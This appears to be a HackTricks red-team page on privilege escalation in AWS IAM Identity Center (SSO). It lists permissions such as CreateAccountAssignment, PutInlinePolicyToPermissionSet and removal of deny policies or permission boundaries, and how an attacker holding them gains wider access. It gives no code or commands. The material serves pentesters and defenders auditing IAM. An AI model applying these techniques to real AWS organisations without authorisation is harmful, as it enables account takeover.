Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
For more information about AWS Identity Center / AWS SSO check:
AWS - IAM, Identity Center & SSO EnumNote that by default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. Users from other accounts can only allow it if the account is a Delegated Adminstrator. Check the docs for more info.
An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.
identitystore:CreateGroupMembershipWith this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.
sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSetAn attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSetAn attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSetAn attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.
To abuse these permissions in this case you need to know the name of a customer managed policy that is inside ALL the accounts that are going to be affected.
sso:CreateAccountAssignmentAn attacker with this permission could give a Permission Set to a user under his control to an account.
sso:GetRoleCredentialsReturns the STS short-term credentials for a given role name that is assigned to the user.
However, you need an access token that I'm not sure how to get (TODO).
sso:DetachManagedPolicyFromPermissionSetAn attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).
sso:DetachCustomerManagedPolicyReferenceFromPermissionSetAn attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).
sso:DeleteInlinePolicyFromPermissionSetAn attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant more privileges via detaching an inline policy (deny policy).
sso:DeletePermissionBoundaryFromPermissionSetAn attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant more privileges by removing the restrictions on the Permission Set given from the Permission Boundary.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
